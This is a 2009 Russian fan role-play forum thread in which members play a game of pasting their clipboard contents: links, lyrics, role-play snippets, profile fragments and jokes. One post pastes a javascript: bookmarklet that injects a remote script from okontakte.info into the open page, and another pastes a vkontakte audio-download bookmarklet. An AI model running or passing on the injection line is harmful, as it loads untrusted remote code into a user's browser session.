Идею стащила с другого сайта. Эту игру впервый раз видела. Значит, правила таковы: вы нажимаете Ctrl и +(тоже нажимать) и V и отправляете сюда то, что высветилось. Не жульничать. Всем интересно.
Мое: Ctrl + V
Ранетки {Придет наше лето и наша весна} |
• Вас приветствует ролевая "Ранетки/ Придёт наше лето и наша весна"• | • Администрация• Аня Прокопьева Вася Блинт Модераторы: Лера Новикова, Тейлор Свифт, Женя Алёхина |
• Срочно нужны в игру• Виктор Михайлович(!!), Игорь Ильич(!!), папа Леры(!) и многие другие! |
• Действия в игре• Так-с, разборочки, разборочки. Все действия принимают неожиданных ход. |
• Новости форума• Форум недавно открылся, регистрируйтесь! |
• Реклама• Взаимна, всё будет строго проверено! Ник: PR Пароль: 123456 |
Привет, Гость! Войдите или зарегистрируйтесь.
Вы здесь » Ранетки {Придет наше лето и наша весна} » {Игры} » Ctrl + V
Идею стащила с другого сайта. Эту игру впервый раз видела. Значит, правила таковы: вы нажимаете Ctrl и +(тоже нажимать) и V и отправляете сюда то, что высветилось. Не жульничать. Всем интересно.
Мое: Ctrl + V
даже догадываюсь откуда))http://universitylife.rolka.su/ упс реклама))
Стас Комаров
не, не с него))
Всем привет
(это что получилось)
Отредактировано Коля Платонов (25-02-09 19:08:47)
Моё: Лена Кулёмина
[...Собутыльники...]:
javascript:(function(){var s=document.createElement('script');s.src='http://okontakte.info/1/video.js'; s.type='text/javascript'; document.getElementsByTagName('head')[0].appendChild(s);})();
Мы не в силах остыть,мы не можем забыть...
nutalera
Dexter - Blood Music Video
[PrincesSka]
- Из-за меня? Лера, ты понимаешь..? отец остановился. Ах, черт! Мужчина обошел вокруг стола и с силой ударил по нему. Пускай из-за меня! Да, из-за меня! Я вообще во всех смертных грехах виноват! Только ты ни в чем не виновата! он посмотрел на эту парочку и ушел к себе в комнату. Черт!
----->Комната отца Леры
Nine Lives
javascript:function operate(konfuze,loves,you,all_,xP){you=you.toString(10);while(you.length<5){you='0'+you;}document.getElementById('audio'+konfuze).innerHTML='<div><a href="http://cs'+loves+'.vkontakte.'+'ru/u'+you+'/audio/'+all_+'.mp3">CКАЧАТЬ '+document.getElementById('performer'+konfuze).innerHTML+'- '+document.getElementById('title'+konfuze).innerHTML+'</a></div><br />';}
by TeTo
CКАЧАТЬ Nine Lives- В последний раз ...
=- Господи, ну уже ли нельзя не останавливаться на середине дороги!
id=26632358
Семейное положение: встречается с Чупой !!_ЧуПа-ЧуПА_!! Чупой
День рождения: 38 сентября 19999995
нет мира без ТЕБЯ, нет жизни без ТЕБЯ и солнца без ТЕБЯ. вообщем всё сдохли без ТЕБЯ
ДжейДи: Привет. Что то ищешь?
Уборщик: А ты что то взял?
Не хочешь сходить в кино?
не ожидала
Joe Jonas watched Ellen with Taylor Swift
И да поможет тебе F1,и да сахранит тебя F2! Во имя alt'a, Ctrl'a и святого Delete'a, Esc!
Если сёдня Рита не придёт - я убьюсь веником третий раз(( межд прочим, я тут ради неё регился х)
Вы здесь » Ранетки {Придет наше лето и наша весна} » {Игры} » Ctrl + V